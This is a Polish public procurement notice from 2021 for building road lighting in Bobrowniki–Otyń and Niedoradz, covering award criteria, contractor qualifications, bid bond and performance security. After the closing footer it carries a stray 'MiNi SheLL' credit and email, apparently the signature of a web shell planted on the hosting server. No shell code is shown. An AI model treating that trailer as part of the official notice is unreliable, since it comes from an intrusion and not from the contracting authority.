punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium<br/>wynosi 40 pkt.<br/>2) Wyliczenie wartości punktowej dla kryterium okres gwarancji obliczone zostanie według poniższego<br/>wzoru według zasady:<br/>a) Okres gwarancji minimum 36 miesięcy – wykonawca otrzyma 0 pkt.<br/>b) za wydłużenie okresu gwarancji o 6 miesięcy – wykonawca otrzyma 10 pkt<br/>c) za wydłużenie okresu gwarancji o 12 miesięcy – wykonawca otrzyma 20 pkt<br/>d) za wydłużenie okresu gwarancji o 18 miesięcy – wykonawca otrzyma 30 pkt<br/>e) za wydłużenie okresu gwarancji o 24 miesiące – wykonawca otrzyma 40 pkt<br/>5) Wymagany minimalny okres gwarancji wynosi 36 miesięcy.<br/>6) W przypadku gdy Wykonawca, który zaoferuje okres gwarancji krótszy niż 36 miesięcy oferta<br/>Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść<br/>nie odpowiada treści SWZ.<br/>7) Brak wskazania w ofercie w formularzu ofertowym okresu gwarancji na roboty budowlane będzie<br/>równoznaczne z zaoferowaniem przez wykonawcę okresu gwarancji w wielkości 36 miesięcy i oferta<br/>otrzyma w tym kryterium oceny ofert 0 punktów.<br/>8) Jeżeli Wykonawca zaproponuje okres gwarancji dłuższy niż 60 miesięcy, do oceny ofert w kryterium<br/>„Okres udzielonej gwarancji na wykonane roboty budowlane” oferta otrzyma w tym kryterium oceny<br/>ofert 40 punktów.<br/>23.5 Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez<br/>Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone<br/>kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania<br/>kryterialne, przypisana zostanie proporcjonalnie mniejsza ilość punktów. 23.6 Ocenę całkowitą oferty stanowi suma punktów poszczególnych kryteriów. Łączna wartość<br/>punktowa zostanie obliczona poprzez zsumowanie wartości: wartość punktowa w kryterium „Cena<br/>ryczałtowa brutto za całość zamówienia” + wartość punktowa w kryterium „Okres udzielonej gwarancji<br/>na wykonane roboty budowlane”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji na wykonane roboty 4.3.6.) Waga:</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 27.2 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia szczegółowych<br/>wymagań w zakresie spełniania tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów: Zamawiający nie stawia szczegółowych wymagań w zakresie<br/>spełniania tego warunku.<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia szczegółowych wymagań w<br/>zakresie spełniania tego warunku.<br/>4) zdolności technicznej lub zawodowej<br/>a) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy<br/>zdolności w zakresie doświadczenia tj.:<br/> w przypadku złożenia oferty na część nr 1 (Budowa oświetlenia drogi powiatowej nr 1028 F<br/>Ogłoszenie nr 2021/BZP 00087394/01 z dnia 2021-06-18<br/>2021-06-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>relacji Bobrowniki – Otyń): w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie trzy roboty<br/>budowlane (realizowane na podstawie trzech odrębnych umów) polegające na budowie kablowej<br/>linii oświetlenia drogowego wraz zakupem oraz montaż słupów oświetleniowych, każda o<br/>wartości minimum 100 000,00 zł łącznie z podatkiem VAT za każdą<br/>z tych trzech robót.<br/> w przypadku złożenia oferty na część nr 2 (Budowa oświetlenia drogowego w m. Niedoradz –<br/>ul. Drzewna, Krasickiego, Kwiatowa, Podgórna ): w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wykonał należycie trzy roboty budowlane polegające na budowie kablowej linii oświetlenia<br/>drogowego wraz zakupem oraz montaż słupów oświetleniowych, każda o wartości minimum 150<br/>000,00 zł złotych łącznie z podatkiem VAT. W okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał<br/>należycie jedną dokumentację projektową na budowie kablowej linii oświetlenia drogowego wraz<br/>z uzyskaniem niezbędnych zgód i pozwoleń, o wartości kosztorysowej robót budowlanych<br/>minimum 150 000,00 zł złotych łącznie z podatkiem VAT.<br/> Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla<br/>uzyskania wymaganych wartości porównywalnych.<br/> W niniejszej SWZ definicje budowy, przebudowy lub remontu należy rozumieć zgodnie z<br/>definicjami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333, 2127,<br/>2320, z 2021 r. poz.11).<br/>b) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy<br/>zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania<br/>zamówienia:<br/> Kierownik robót, minimalne wymagania: uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych, które uprawniają do pełnienia funkcji kierownika robót w zakresie<br/>odpowiadającym przedmiotowi zamówienia, określone przepisami ustawy z dnia 7 lipca 1994 r.<br/>Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz.11) lub<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/> Wykonawca składający ofertę na więcej niż jedną część zamówienia może wykazać<br/>dysponowanie tą samą osobą.<br/> Zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje<br/>techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje<br/>zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. ustawie z dnia<br/>22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz.U. z 2018r. poz. 2272 ze zm.) oraz ustawie z dnia<br/>15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz<br/>urbanistów (Dz. U. z 2016 poz. 1725 ze zm.).<br/>5.5.) Zamawiający wymaga złożenia oświadczenia, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">28.1 Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>Ogłoszenie nr 2021/BZP 00087394/01 z dnia 2021-06-18<br/>2021-06-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty- zgodnie z załącznikiem nr 6 do SWZ.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem nr 7<br/>do SWZ.<br/>3) Oświadczenie wykonawcy dotyczące przynależności do grupy kapitałowej załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>d) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>e) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy);<br/>f) w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru:<br/> w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty<br/>składa każdy z wykonawców,<br/> w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału w postępowaniu<br/>polega na zdolnościach technicznych lub zawodowych podmiotów udostepniających zasoby,<br/>należy złożyć dodatkowo dokumenty dotyczące tego podmiotu.<br/> Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ppkt. f), jeżeli<br/>zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w oświadczeniu, którego<br/>wzór stanowi załącznik nr 2 do SWZ.<br/>g) zobowiązanie podmiotu udostępniającego zasoby Wykonawcy zgodnie z załącznikiem nr 4 do<br/>SWZ (jeżeli dotyczy).<br/>h) Oświadczenie wykonawców wspólnie o udzielenie zamówienia składane na podstawie art.<br/>117 ust. 4 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych zgodnie z<br/>załącznikiem Załącznik nr 5 do SWZ (jeżeli dotyczy).<br/>29.7 Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt.<br/>29.3 pkt 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w<br/>postaci elektronicznej.<br/>29.8 W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczenia,<br/>gwarancja lub poręczenie powinno być sporządzone zgodnie z obowiązującym prawem i winno<br/>zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy) (w przypadku wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia – zaleca się wymienienie wszystkich wykonawców), beneficjenta<br/>gwarancji lub poręczenia (zamawiającego), gwaranta lub poręczyciela (np. banku lub instytucji<br/>ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,<br/>3) kwotę gwarancji lub poręczenia,<br/>4) termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania<br/>wykonawcy złożoną przez niego ofertą),<br/>5) zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na<br/>pierwsze pisemne żądanie zamawiającego zawierające oświadczenie, iż:<br/>a) wykonawca, którego ofertę wybrano: (i) odmówił podpisania umowy na warunkach<br/>określonych w ofercie, lub (ii) nie wniósł wymaganego zabezpieczenia należytego wykonania<br/>umowy, lub (iii) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie<br/>wykonawcy;<br/>b) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z<br/>przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów<br/>lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt<br/>3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako<br/>najkorzystniejszej<br/>6) oznaczenie postępowania, którego wadium dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 29.1 Zamawiający określa kwotę wadium w następującej wysokości:<br/>1) W przypadku złożenia oferty na część nr 1 (Budowa oświetlenia drogi powiatowej nr 1028 F<br/>relacji Bobrowniki – Otyń ): 1 940,00 zł.<br/>2) W przypadku złożenia oferty na część nr 2 (Budowa oświetlenia drogowego w m. Niedoradz –<br/>ul. Drzewna, Krasickiego, Kwiatowa, Podgórna): 5 000,00 zł.<br/>Wadium należy wnosić na każdą część odrębnie.<br/>29.2 Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do<br/>dnia upływu terminu związania ofert.<br/>29.3 Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>29.4 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy o numerze:<br/>66 9674 0006 0000 0000 0680 0013. W tytule przelewu należy podać numer referencyjny<br/>postępowania tj.: RIiZP.271.5.2021.<br/>29.5 Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki<br/>pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>29.6 Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>29.7 Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt.<br/>29.3 pkt 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w<br/>postaci elektronicznej.<br/>29.8 W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczenia,<br/>gwarancja lub poręczenie powinno być sporządzone zgodnie z obowiązującym prawem i winno<br/>zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy) (w przypadku wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia – zaleca się wymienienie wszystkich wykonawców), beneficjenta<br/>gwarancji lub poręczenia (zamawiającego), gwaranta lub poręczyciela (np. banku lub instytucji<br/>ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,<br/>3) kwotę gwarancji lub poręczenia,<br/>4) termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania<br/>wykonawcy złożoną przez niego ofertą),<br/>5) zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na<br/>pierwsze pisemne żądanie zamawiającego zawierające oświadczenie, iż:<br/>a) wykonawca, którego ofertę wybrano: (i) odmówił podpisania umowy na warunkach<br/>określonych w ofercie, lub (ii) nie wniósł wymaganego zabezpieczenia należytego wykonania<br/>umowy, lub (iii) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie<br/>wykonawcy;<br/>b) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z<br/>przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów<br/>lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt<br/>3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako<br/>najkorzystniejszej<br/>6) oznaczenie postępowania, którego wadium dotyczy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 30.1 Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy, zwanego<br/>dalej „zabezpieczeniem” w wysokości 5 % ceny oferty.<br/>30.2 Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego<br/>wykonania umowy.<br/>30.3 Zabezpieczenie wnosi się przed zawarciem umowy.<br/>30.4 Zabezpieczenie może być wnoszone, według wyboru wykonawcy, w jednej lub w kilku<br/>następujących formach:<br/>1) pieniądzu;<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z<br/>tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>30.5 Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek<br/>bankowy wskazany przez Zamawiającego.<br/>30.6 W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na<br/>zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>30.7 Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na<br/>oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w<br/>pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono<br/>przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za<br/>przelew pieniędzy na rachunek bankowy wykonawcy.<br/>30.8 W trakcie realizacji umowy wykonawca może dokonać zmiany formy zabezpieczenia na<br/>jedną lub kilka form, o których mowa w pkt. 30.4.<br/>30.9 Zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości zabezpieczenia i<br/>bez zmniejszenia jego wysokości.<br/>30.10 Jeżeli okres realizacji zamówienia jest dłuższy niż rok, zabezpieczenie, za zgodą<br/>Zamawiającego, może być tworzone przez potrącenia z należności za częściowo wykonane<br/>dostawy, usługi lub roboty budowlane.<br/>30.11 W przypadku, o którym mowa w pkt. 30.10, w dniu zawarcia umowy wykonawca jest<br/>obowiązany wnieść co najmniej 30% kwoty zabezpieczenia.<br/>30.12 Zamawiający wpłaca kwoty potrącane na rachunek bankowy w tym samym dniu, w którym dokonuje zapłaty faktury.<br/>30.13 W przypadku, o którym mowa w pkt. 30.10, wniesienie pełnej wysokości zabezpieczenia<br/>nie może nastąpić później niż do połowy okresu, na który została zawarta umowa.<br/>30.14 Jeżeli okres na jaki ma zostać wniesione zabezpieczenie przekracza 5 lat,<br/>zabezpieczenie w pieniądzu wnosi się na cały ten okres, a zabezpieczenie w innej formie wnosi<br/>się na okres nie krótszy niż 5 lat, z jednoczesnym zobowiązaniem się wykonawcy do<br/>przedłużenia zabezpieczenia lub wniesienia nowego zabezpieczenia na kolejne okresy.<br/>30.15 W przypadku nieprzedłużenia lub niewniesienia nowego zabezpieczenia najpóźniej na 30<br/>dni przed upływem terminu ważności dotychczasowego zabezpieczenia wniesionego w innej<br/>formie niż w pieniądzu, Zamawiający zmienia formę na zabezpieczenie w pieniądzu, przez<br/>wypłatę kwoty z dotychczasowego zabezpieczenia.<br/>30.16 Wypłata, o której mowa w pkt. 30.15, następuje nie później niż w ostatnim dniu ważności<br/>dotychczasowego zabezpieczenia.<br/>30.17 Zamawiający zwraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia i<br/>uznania przez Zamawiającego za należycie wykonane.<br/>30.18 Zamawiający pozostawia na zabezpieczenie roszczeń z tytułu rękojmi za wady lub<br/>gwarancji kwotę 30% zabezpieczenia.<br/>30.19 Kwota, o której mowa w pkt. 30.18, jest zwracana nie później niż w 15. dniu po upływie<br/>okresu rękojmi za wady lub gwarancji.<br/>30.20 Zamawiający może dokonać częściowego zwrotu zabezpieczenia po wykonaniu części<br/>zamówienia, jeżeli przewidział taką możliwość w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość zmiany umowy w przypadkach określonych w art. 454<br/>oraz 455 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz.<br/>2019 z późn. zm.) oraz przewiduje zgodnie z art. 455 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2019 r. poz. 2019<br/>z późn. zm.)możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie,<br/>której dokonano wyboru Wykonawcy, określając następujący zakres, charakter oraz warunki<br/>zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy - w wypadku wystąpienia jednej z następujących okoliczności:<br/>1) W zakresie dotyczącym zmiany sposobu wykonania przedmiotu umowy w przypadku:<br/>a) zmiany przepisów prawa powodujących konieczność zmiany materiałów budowlanych,<br/>urządzeń lub przyjęcia innych rozwiązań technicznych wykonania robót w stosunku do<br/>określonych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,<br/>b) zrealizowania przedmiotu umowy przy zastosowaniu innych materiałów lub rozwiązań<br/>technicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i<br/>odbioru robót w sytuacji, gdyby zastosowanie przewidzianych materiałów lub rozwiązań groziło<br/>niewykonaniem lub wadliwym wykonaniem przedmiotu umowy lub w przypadkach będących<br/>następstwem usunięcia ich wad.<br/>2) W zakresie dotyczącym wynagrodzenia w przypadku:<br/>a) ustawowej zmiany stawki podatku od towarów i usług (VAT), w takim przypadku<br/>wynagrodzenie należne Wykonawcy zostanie odpowiednio zmienione w stosunku wynikającym<br/>ze zmienionej stawki podatku od towarów i usług (VAT),<br/>b) konieczności wykonania robót zamiennych, jeżeli wprowadzane zmiany będą miały wpływ na koszty wykonania zamówienia, o różnicę pomiędzy wartością robót zamiennych a wartością<br/>robót, które nie będą wykonywane - podstawą obliczenia kosztów zmiany mającej wpływ na<br/>wynagrodzenie Wykonawcy stanowić będzie zatwierdzony przez Zamawiającego kosztorys<br/>ofertowy opracowany na podstawie cen jednostkowych i danych wyjściowych do<br/>kosztorysowania przyjętych do kosztorysu ofertowego Wykonawcy – w przypadku braku<br/>właściwych cen Wykonawca kalkulując cenę jednostkową przyjmuje ceny materiałów wg cen<br/>zakupu i pracy sprzętu wg faktycznie poniesionych kosztów lecz nie wyższe niż średnie ceny<br/>materiałów i pracy sprzętu wg SECOCENBUDU dla rejonu lubuskiego, dla kwartału<br/>poprzedzającego kwartał, w którym wykonywane są roboty,<br/>c) w przypadku stwierdzenia przez Zamawiającego z przyczyn technicznych o obiektywnym<br/>charakterze braku konieczności wykonania części robót budowlanych stanowiących przedmiot<br/>umowy – w takim przypadku zmiana dotyczyć będzie zmniejszenia zakresu przedmiotu umowy<br/>oraz obniżenia wysokości należnego Wykonawcy wynagrodzenia, o wartość tej części<br/>przedmiotu umowy ustaloną na podstawie kosztorysu ofertowego - Wykonawcy z tego tytułu nie<br/>przysługują żadne roszczenia; w tym prawo do odszkodowania - zmiana następuje poprzez<br/>jednostronne oświadczenie woli Zamawiającego złożone Wykonawcy w formie pisemnej.<br/>3) W zakresie dotyczącym zmiany terminu wykonania przedmiotu umowy w przypadku;<br/>a) wystąpienia zwłoki Zamawiającego w przekazaniu terenu budowy,<br/>b) wstrzymania realizacji umowy z przyczyn i leżących po stronie Zamawiającego, tj. zwłoki,<br/>utrudnienia lub przeszkody dające się przypisać Zamawiającemu,<br/>c) konieczności usunięcia wady lub wprowadzenia zmiany w dokumentacji projektowej, jeżeli<br/>konieczność usunięcie wady lub wprowadzenia zmiany w dokumentacji projektowej ma wpływ<br/>na wystąpienie przestojów w realizacji robót budowlanych i termin wykonania przedmiotu<br/>umowy (...) Pozostały opis znajduje się w załączniku nr 9 i 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-26 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-26 08:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-24</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com